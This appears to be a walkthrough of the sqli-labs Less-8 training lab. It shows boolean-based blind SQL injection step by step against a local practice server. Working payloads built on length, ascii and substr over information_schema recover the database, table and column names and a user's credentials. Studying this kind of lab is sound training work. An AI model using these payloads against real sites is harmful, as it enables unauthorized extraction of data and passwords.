- sqli-labs Less-8 (boolean-based blind injection)
(1) Find the closing character
① Request http://192.168.88.138:98/Less-8/?id=1' : page abnormal
② Request http://192.168.88.138:98/Less-8/?id=1' and 1=1 -- + : page normal
③ Request http://192.168.88.138:98/Less-8/?id=1' and 1=2 -- + : page abnormal
Together these show that the parameter sits inside single quotes, so the closing character is '. The 1=1 / 1=2 pair is also the oracle used for every step below: "page normal" means the injected condition evaluated true, "page abnormal" means it evaluated false (or broke the query). Nothing from the database is ever displayed, so every value has to be recovered one true/false question at a time.
(2) Find the length of the current database name
① Request http://192.168.88.138:98/Less-8/?id=1' and length(database())<10 -- + : page normal
② Request http://192.168.88.138:98/Less-8/?id=1' and length(database())<5 -- + : page abnormal
③ Request http://192.168.88.138:98/Less-8/?id=1' and length(database())<7 -- + : page abnormal
④ Request http://192.168.88.138:98/Less-8/?id=1' and length(database())=8 -- + : page normal
So the database name is 8 characters long: the < probes narrow the range by binary search (the length is in [7, 9]), and the final =8 probe confirms it.
(3) Find the ASCII value of each character of the database name (same method as the length: for each position i, binary-search ascii(substr(database(),i,1)) with > / < probes; only the final confirming =N probe is shown for each position)
① Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),1,1)) =115 -- + : page normal
So the first character of the database name is s (115)
② Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),2,1)) =101 -- + : page normal
So the second character is e (101)
③ Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),3,1)) =99 -- + : page normal
So the third character is c (99)
④ Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),4,1)) =117 -- + : page normal
So the fourth character is u (117; the original post typed 101 here, which is e, not u)
⑤ Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),5,1)) =114 -- + : page normal
So the fifth character is r (114)
⑥ Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),6,1)) =105 -- + : page normal
So the sixth character is i (105)
⑦ Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),7,1)) =116 -- + : page normal
So the seventh character is t (116)
⑧ Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),8,1)) =121 -- + : page normal
So the eighth character is y (121)
Putting the eight characters together, the current database is security.
(4) Find the number of tables (same method: binary search on the count, then confirm with =N)
① Request http://192.168.88.138:98/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4 -- + : page normal
So the database has 4 tables.
(5) Find the length of each table name (limit N,1 selects the table at zero-based offset N)
① Request http://192.168.88.138:98/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 -- + : page normal
So the first table name (offset 0) is 6 characters long
② Request http://192.168.88.138:98/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 2,1))=7 -- + : page normal
So the third table name (offset 2) is 7 characters long (the original post called this the second table; limit 2,1 is the third)
③ ....
(6) Find the ASCII values of the table name characters
① Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117 -- + : page normal
So the first character of the fourth table name (offset 3) is u (117)
② Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),2,1))=115 -- + : page normal
So the second character of the fourth table name is s (115)
③ ...
Continuing position by position, the fourth table is named users.
(7) Find the number of columns in users
Request http://192.168.88.138:98/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=3 --+ : page normal
So the users table has 3 columns.
(8) Find the ASCII values of the column name characters
① Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),1,1))=105 -- + : page normal
So the first character of the first column name is i (105)
② Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 -- + : page normal
So the second character of the first column name is d (100)
③ ...
④ Repeating for offsets 0, 1 and 2, the three columns are id, username and password.
(9) Find the number of rows in users
Request http://192.168.88.138:98/Less-8/?id=1' and (select count(*) from users)=13 -- + : page normal
So the table holds 13 rows.
(10) Find the length of a field value
① Request http://192.168.88.138:98/Less-8/?id=1' and length((select id from users limit 0,1))=1 --+ : page normal
So the id value of the first row is 1 character long
(11) Find the ASCII values of the field value characters
① Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+ : page normal
So the first character of the first username is D (68)
② Request http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),2,1))=117 --+ : page normal
So the second character is u (117)
③ ...
Finishing the remaining positions (and doing the same for password), the first row is id=1, username Dumb, password Dumb. The other 12 rows are recovered by stepping limit 1,1 through limit 12,1.
Source: https://www.cnblogs.com/koitoYuu/p/17128870.html